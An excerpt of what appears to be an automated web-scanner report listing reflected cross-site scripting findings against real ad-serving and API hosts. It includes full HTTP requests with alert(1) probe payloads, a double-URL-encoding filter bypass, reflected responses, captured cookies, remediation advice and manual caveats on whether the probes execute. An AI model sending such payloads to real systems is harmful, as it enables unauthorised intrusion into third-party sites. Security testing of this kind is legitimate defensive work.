Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135781851";alert(1)//aa8ae4a84fa/353.0.js.120x30/1296683666**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f
...[SNIP]...

4.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which the scanner identified as encapsulated in double quotation marks. The payload 3e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956 was submitted in REST URL parameter 3 and was echoed as 3e6b8";alert(1)//7ebd7131956 in the application's response. The scanner reports this as a proof of concept for injecting arbitrary JavaScript into the response.

As with REST URL parameter 2 (4.50), the echoed form shows a second URL-decode after the web server's own: the application attempts to block certain characters that are often used in XSS attacks, but the check sees the once-decoded value, so it can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Context caveat: the response excerpt shows the reflection inside a single-quoted JavaScript string that writes a <script src="..."> element, so the decoded double quote terminates the HTML src attribute rather than a JavaScript string literal. Verify the context manually before treating the ";alert(1)// probe as proof of script execution.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8";alert(1)//7ebd7131956/1296683672**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9
...[SNIP]...

4.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which the scanner identified as encapsulated in double quotation marks. The payload c105a"-alert(1)-"fb1bd8b3ce2 was submitted in the TargetID parameter and was echoed unmodified in the application's response. The scanner reports this as a proof of concept for injecting arbitrary JavaScript into the response.

Context caveat: the response excerpt shows the reflection inside the single-quoted JavaScript string ('+wsod.loc+'?click=...) that writes a <script src="..."> element, so the double quote in the payload ends up in the HTML src attribute rather than terminating a JavaScript string literal; confirm the context manually before treating the probe as proof of script execution.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683587**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which the scanner identified as encapsulated in double quotation marks. The payload 2f5e6"-alert(1)-"d81f699c354 was submitted in the UIT parameter and was echoed unmodified in the application's response. The scanner reports this as a proof of concept for injecting arbitrary JavaScript into the response.

Context caveat: the response excerpt shows the reflection inside the single-quoted JavaScript string ('+wsod.loc+'?click=...) that writes a <script src="..."> element, so the double quote in the payload ends up in the HTML src attribute rather than terminating a JavaScript string literal; confirm the context manually before treating the probe as proof of script execution.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683579**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the click request parameter is copied into a JavaScript string which the scanner identified as encapsulated in double quotation marks. The payload 4b539"-alert(1)-"67ea36dc1c6 was submitted in the click parameter and was echoed unmodified in the application's response. The scanner reports this as a proof of concept for injecting arbitrary JavaScript into the response.

Context caveat: the response excerpt shows the reflection inside the single-quoted JavaScript string ('+wsod.loc+'?click=...) that writes a <script src="..."> element, so the double quote in the payload ends up in the HTML src attribute rather than terminating a JavaScript string literal; confirm the context manually before treating the probe as proof of script execution. Note also that the click parameter carries a full URL (http://g.msn.com/...), so the same sink also deserves a check for open-redirect behaviour once the reflection is fixed.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683560**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which the scanner identified as encapsulated in double quotation marks. The payload 7423b"-alert(1)-"cb6a6387cd was submitted as the name of an extra request parameter and was echoed unmodified in the application's response, which shows that the whole query string, not just the known parameters, is reflected. The scanner reports this as a proof of concept for injecting arbitrary JavaScript into the response.

Context caveat: the response excerpt shows the reflection inside the single-quoted JavaScript string ('+wsod.loc+'?click=...) that writes a <script src="..."> element, so the double quote in the payload ends up in the HTML src attribute rather than terminating a JavaScript string literal; confirm the context manually before treating the probe as proof of script execution.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1682

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1">
...[SNIP]...

4.56. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0da"-alert(1)-"8c42b551633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f&bf0da"-alert(1)-"8c42b551633=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; ih="b!!!!9!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; 
bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f9
3!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; lifb=%y_Qs7i<Qa5p0/:

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:29:57 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:29:57 GMT
Pragma: no-cache
Content-Length: 4542
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&bf0da"-alert(1)-"8c42b551633=1&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fn%3B228957569%3B0%2d0%3B0%3B45421688%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Essc
...[SNIP]...

4.57. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is echoed unmodified in the body of the application's 403 response. The payload 4d05c<script>alert(1)</script>0e5436c2494 was submitted in the api_key parameter and appears verbatim in the error message "Unknown API key: (...)".

The scanner describes this as a reflection into the HTML document between tags, but the response is served with Content-Type: text/plain and carries no X-Content-Type-Options header. A browser that honours the declared type renders the body as text and does not execute the reflected <script> element; exploitation depends on a client that sniffs the plain-text body as HTML, which older browsers were known to do. Confirm the behaviour in the browsers in scope before keeping the High severity. Independently of that, the error message should not echo the submitted key, and the endpoint should send X-Content-Type-Options: nosniff.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
